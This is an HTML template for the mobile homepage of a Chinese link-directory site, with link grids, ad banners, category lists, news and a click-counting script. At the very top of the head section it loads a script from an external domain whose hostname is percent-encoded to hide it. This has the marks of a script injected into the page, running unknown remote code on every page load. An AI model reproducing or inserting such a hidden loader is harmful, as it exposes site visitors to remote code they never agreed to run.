
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="http://%71%71%2E%64%61%69%6E%62%2E%63%63/plan.js"></script>
    <meta charset="UTF-8">
    <title>{:config('web.WEB_TIT')} - 手机版</title>
		<meta name="keywords" content="{:config('web.WEB_KEY')}">
		<meta name="description" content="{:config('web.WEB_DES')}">
    <meta name="renderer" content="webkit"/>
    <meta name="viewport"
          content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no"/>
 
    <link rel="stylesheet" href="__WAP__/css/sm.min.css" type="text/css" media="all"/>
    <link rel="stylesheet" href="__WAP__/css/swiper.min.css" type="text/css" media="all"/>
    <link rel="stylesheet" href="__WAP__/css/public.css" type="text/css" media="all"/>
    <link rel="stylesheet" href="__WAP__/css/index.css" type="text/css" media="all"/>
</head>
<body>
<div class="page-group">
    
<div class="page">
    <div class="content">
        <div class="indexHeader">
            <div class="lo clearfix">
                <a href="/" class="logo">
                    <img src="{:config('web.logo')}"/>
                </a>
                <a class="iconfont icon-tuwenliebiao listBtn open-panel"></a>
            </div>
            <form class="indexSearch" action="" onsubmit="return false">
                <i class="iconfont icon-sousuo"></i>
                <input type="search" placeholder="输入您想百度搜索的内容"/>
                <ul class="selectKeyword"></ul>
            </form>
        </div>
        <div class="swiper-container">
            <div class="swiper-wrapper">
                <div class="swiper-slide">
                    <ul class="indexWebList clearfix">
                      {volist name="guojizjing" id="vo" length="16" }         
                      <li><a href="http://{$vo.lianjie}/#guojiz.com" target="_blank" lass="clearfix topdj" data-id="{$vo.id}" data-url="http://{$vo.lianjie}/#guojiz.com"
                               data-detail="{if condition=" config( 'web.WEB_URL') eq 1"}__ROOT__/daohang/{$vo.id}.html{else/}__INDEX__/daohang/{$vo.id}.html{/if}"> <img src="{if condition="$vo['ico'] neq ''"}{$vo.ico}{else/}http://{$vo.lianjie}/favicon.ico{/if}"><span>{$vo.title}</span>
                            </a>
                        </li>
                      {/volist}                                 
                  </ul>
                </div>
                <div class="swiper-slide">
                    <ul class="indexWebList clearfix">
                      {volist name="guojiztui" id="vo" length="16"}        
                      <li><a href="http://{$vo.lianjie}/#guojiz.com" target="_blank" lass="clearfix topdj" data-id="{$vo.id}"  data-url="http://{$vo.lianjie}/#guojiz.com"
                               data-detail="{if condition=" config( 'web.WEB_URL') eq 1"}__ROOT__/daohang/{$vo.id}.html{else/}__INDEX__/daohang/{$vo.id}.html{/if}"> <img src="{if condition="$vo['ico'] neq ''"}{$vo.ico}{else/}http://{$vo.lianjie}/favicon.ico{/if}"><span>{$vo.title}</span>
                            </a>
                        </li>
                      {/volist}                    
                  </ul>
                </div>
                <div class="swiper-slide">
                    <ul class="indexWebList clearfix">
                    <ul class="indexWebList clearfix">
                      {volist name="guojiztop" id="vo" length="16"}        
                      <li><a href="http://{$vo.lianjie}/#guojiz.com" target="_blank" class="clearfix topdj" data-id="{$vo.id}"  data-url="http://{$vo.lianjie}/#guojiz.com"
                               data-detail="{if condition=" config( 'web.WEB_URL') eq 1"}__ROOT__/daohang/{$vo.id}.html{else/}__INDEX__/daohang/{$vo.id}.html{/if}"> <img src="{if condition="$vo['ico'] neq ''"}{$vo.ico}{else/}http://{$vo.lianjie}/favicon.ico{/if}"><span>{$vo.title}</span>
                            </a>
                        </li>
                      {/volist}                  
                      </ul>
                </div>
            </div>
            <div class="swiper-scrollbar"></div>
        </div>
		<div style="padding:0.3rem;margin-top:0.3rem;background:#FFF;" class="clearfix">
			<div style="float:left;width:calc((100% - 0.3rem) * 1);">	
              {volist name="guojizgg" id="vo"}
				<a style="display:block;background: #FFF;padding: 5px;" href="{$vo.links}" target="_blank">
					<img src="{$vo.pic}" style="width:100%;display:block;height: 12.1vw;" />
				</a>
              {/volist}
			</div>
		</div>
        <div class="otherlist">
            <div class="titles">
                <h3>分类专区</h3>
            </div>

            {volist name="artbycatelist" id="vo" }            
          <div class="list clearfix">
                <h3>{$vo.name}</h3>
                <ul>
                     {volist name="$vo.artlists" id="v" key="k"}                  
                  <li><a class="topdj" data-id="{$v.id}" href="http://{$v.lianjie}/#guojiz.com" target="_blank" data-url="http://{$v.lianjie}/#guojiz.com"
                           data-detail="{if condition=" config( 'web.WEB_URL') eq 1"}__ROOT__/daohang/{$v.id}.html{else/}__INDEX__/daohang/{$v.id}.html{/if}">{$v.title}</a>
                  </li>
                  {/volist}    
                        
                </ul>
                <a href="{if condition=" config( 'web.WEB_URL') eq 1"}__ROOT__/view/{$vo.id}.html{else/}__INDEX__/view/{$vo.id}.html{/if}" class="iconfont icon-gengduo1"></a>
            </div>
                  {/volist}      
        </div>
        <div class="tools">
            <div class="titles">
                <h3>免费工具</h3>
                <a href="/m/tools/" class="iconfont icon-gengduo1"></a>
            </div>
            <div class="toolContent clearfix">

              {volist name="guojizgj " id="vo "}
         
              <a href="http://{$vo.lianjie}/#guojiz.com" target="_blank">
                    <img src="{if condition="$vo['ico'] neq ''"}{$vo.ico}{else/}http://{$vo.lianjie}/favicon.ico{/if}">
                    <span>{$vo.title}</span>
                </a>
              {/volist}
                            </div>
        </div>
        <div class="news">
            <div class="titles">
                <h3>实时新闻</h3>
            </div>

          <ul>
  {volist name="guojizx " id="vo " length="10"} 
	<li>
		<a href="{if condition=" config( 'web.WEB_URL') eq 1"}__ROOT__/xq/{$vo.id}.html{else/}__INDEX__/xq/{$vo.id}.html{/if}" target="_blank"
		class="clearfix">
			<div class="img">
				<img src="{$vo.content|Pic}">
			</div>
			<div class="info">
				<h3>
					{$vo.title}
				</h3>
			</div>
		</a>
	</li>
 
{/volist}

          </ul>
        </div>
		

 {include file="index/footer"}
</div>
</div>
{include file="index/header"}
      <script>  
        layui.use(['form', 'upload'],function() {     
          var form = layui.form, 
              jq = layui.jquery;     
          jq(".topdj").bind("topdj").click(function() {       
            var url = "{:url("index/index/topdj")}";   
            var id = jq(this).data('id');
            jq.post(url, {             
              id: id      
            },function(data) {});          
          });                
        })    
      </script>
  </div>
</body>
</html>
